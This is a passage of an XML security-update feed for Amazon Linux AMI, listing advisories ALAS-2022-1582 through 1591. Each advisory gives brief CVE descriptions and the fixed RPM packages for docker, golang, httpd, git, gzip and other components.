</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26490" title="" id="CVE-2022-26490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27666" title="" id="CVE-2022-27666" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28356" title="" id="CVE-2022-28356" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.275-142.503.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1582</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1582: medium priority package update for containerd docker</title><issued date="2022-04-25 15:57:00" /><updated date="2022-04-28 21:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24769:
A flaw was found in Moby (Docker Engine), where containers were started incorrectly with non-empty inheritable Linux process capabilities. This flaw allows an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. Containers using Linux users and groups to perform privilege separation inside the container are most directly impacted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24769" title="" id="CVE-2022-24769" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd" version="1.4.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-2.1.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-2.1.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-2.1.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.13-2.1.amzn1.x86_64.rpm</filename></package><package name="docker" version="20.10.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.13-2.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1583</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1583: important priority package update for golang</title><issued date="2022-04-25 15:59:00" /><updated date="2024-01-03 22:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44717:
There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().
CVE-2021-44716:
There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.
CVE-2021-41772:
A vulnerability was found in archive/zip of the Go standard library. Applications written in Go where Reader.Open (the API implementing io/fs.FS introduced in Go 1.16) can panic when parsing a crafted ZIP archive containing completely invalid names or an empty filename argument.
CVE-2021-41771:
An out of bounds read vulnerability was found in debug/macho of the Go standard library. When using the debug/macho standard library (stdlib) and malformed binaries are parsed using Open or OpenFat, it can cause golang to attempt to read outside of a slice (array) causing a panic when calling ImportedSymbols. An attacker can use this vulnerability to craft a file which causes an application using this library to crash resulting in a denial of service.
CVE-2021-38297:
A validation flaw was found in golang. When invoking functions from WASM modules built using GOARCH=wasm GOOS=js, passing very large arguments can cause portions of the module to be overwritten with data from the arguments. The highest threat from this vulnerability is to integrity.
CVE-2021-27919:
An out of bounds read vulnerability was found in golang. When using the archive/zip standard library (stdlib) and an unexpected file is parsed, it can cause golang to attempt to read outside of a slice (array) causing a panic in the runtime. A potential attacker can use this vulnerability to craft an archive which causes an application using this library to crash resulting in a Denial of Service (DoS).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27919" title="" id="CVE-2021-27919" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38297" title="" id="CVE-2021-38297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41771" title="" id="CVE-2021-41771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41772" title="" id="CVE-2021-41772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716" title="" id="CVE-2021-44716" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44717" title="" id="CVE-2021-44717" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.16.15" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang" version="1.16.15" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.16.15" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.16.15-1.37.amzn1.i686.rpm</filename></package><package name="golang" version="1.16.15" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.16.15-1.37.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.16.15" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.16.15-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1584</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1584: important priority package update for httpd24</title><issued date="2022-04-26 17:12:00" /><updated date="2022-04-28 21:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23943:
An out-of-bounds read/write vulnerability was found in the mod_sed module of httpd. This flaw allows an attacker to overwrite the memory of an httpd instance that is using mod_sed with data provided by the attacker.
CVE-2022-22721:
A flaw was found in httpd, where it incorrectly limits the value of the LimitXMLRequestBody option. This issue can lead to an integer overflow and later causes an out-of-bounds write.
CVE-2022-22720:
A flaw was found in httpd. The inbound connection is not closed when it fails to discard the request body, which may expose the server to HTTP request smuggling.
CVE-2022-22719:
A flaw was found in the mod_lua module of httpd. A crafted request body can cause a read to a random memory area due to an uninitialized value in functions called by the parsebody function. The highest treat of this vulnerability is availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22719" title="" id="CVE-2022-22719" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22720" title="" id="CVE-2022-22720" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22721" title="" id="CVE-2022-22721" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23943" title="" id="CVE-2022-23943" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_session" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.53" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.53-1.96.amzn1.noarch.rpm</filename></package><package name="mod24_ldap" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.53" release="1.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.53" release="1.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.53" release="1.96.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.53" release="1.96.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.53-1.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1585</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1585: critical priority package update for xmlrpc-c</title><issued date="2022-05-20 22:12:00" /><updated date="2022-05-24 01:25:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25235:
A flaw was found in expat. Passing malformed 2- and 3-byte UTF-8 sequences (for example, from start tag names) to the XML processing application on top of expat can lead to arbitrary code execution. This issue is dependent on how invalid UTF-8 is handled inside the XML processor.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25235" title="" id="CVE-2022-25235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xmlrpc-c-client" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-client-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-client++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-client++-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-debuginfo" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-debuginfo-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-devel" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-devel-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-c++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-c++-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-apps" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-apps-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-debuginfo" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-debuginfo-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-apps" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-apps-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-c++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-c++-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-client++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-client++-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-client" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-client-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-devel" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-devel-1.22.04-r1934.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1586</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1586: critical priority package update for openldap</title><issued date="2022-05-20 22:13:00" /><updated date="2022-05-24 01:27:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29155:
In OpenLDAP 2.x before 2.5.12 and 2.6.x before 2.6.2, a SQL injection vulnerability exists in the experimental back-sql backend to slapd, via a SQL statement within an LDAP query. This can occur during an LDAP search operation when the search filter is processed, due to a lack of proper escaping.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29155" title="" id="CVE-2022-29155" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-servers-sql" version="2.4.40" release="16.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-16.32.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.32.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-16.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1587</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1587: important priority package update for aide</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-45417:
A heap-based buffer overflow vulnerability in the base64 functions of AIDE, an advanced intrusion detection system. An attacker could crash the program and possibly execute arbitrary code through large (<16k) extended file attributes or ACL.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45417" title="" id="CVE-2021-45417" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aide" version="0.14" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/aide-0.14-7.9.amzn1.x86_64.rpm</filename></package><package name="aide-debuginfo" version="0.14" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/aide-debuginfo-0.14-7.9.amzn1.x86_64.rpm</filename></package><package name="aide" version="0.14" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/aide-0.14-7.9.amzn1.i686.rpm</filename></package><package name="aide-debuginfo" version="0.14" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/aide-debuginfo-0.14-7.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1588</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1588: medium priority package update for expat</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-45960:
In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45960" title="" id="CVE-2021-45960" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="12.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.28.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.28.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.28.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.28.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.28.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.28.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.28.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.28.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1589</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1589: medium priority package update for git</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24765:
A vulnerability was found in Git. This flaw occurs due to Git not checking the ownership of directories in a local multi-user system when running commands specified in the local repository configuration. This allows the owner of the repository to cause arbitrary commands to be executed by other users who access the repository.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24765" title="" id="CVE-2022-24765" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-svn" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-core-doc" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="emacs-git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-core" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.36.1-1.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1590</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1590: important priority package update for gzip</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1271:
An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271" title="" id="CVE-2022-1271" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gzip-debuginfo" version="1.5" release="9.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gzip-debuginfo-1.5-9.20.amzn1.x86_64.rpm</filename></package><package name="gzip" version="1.5" release="9.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gzip-1.5-9.20.amzn1.x86_64.rpm</filename></package><package name="gzip-debuginfo" version="1.5" release="9.20.amzn1" epoch="0" arch="i686"><filename>Packages/gzip-debuginfo-1.5-9.20.amzn1.i686.rpm</filename></package><package name="gzip" version="1.5" release="9.20.amzn1" epoch="0" arch="i686"><filename>Packages/gzip-1.5-9.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1591</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1591: important priority package update for kernel</title><issued 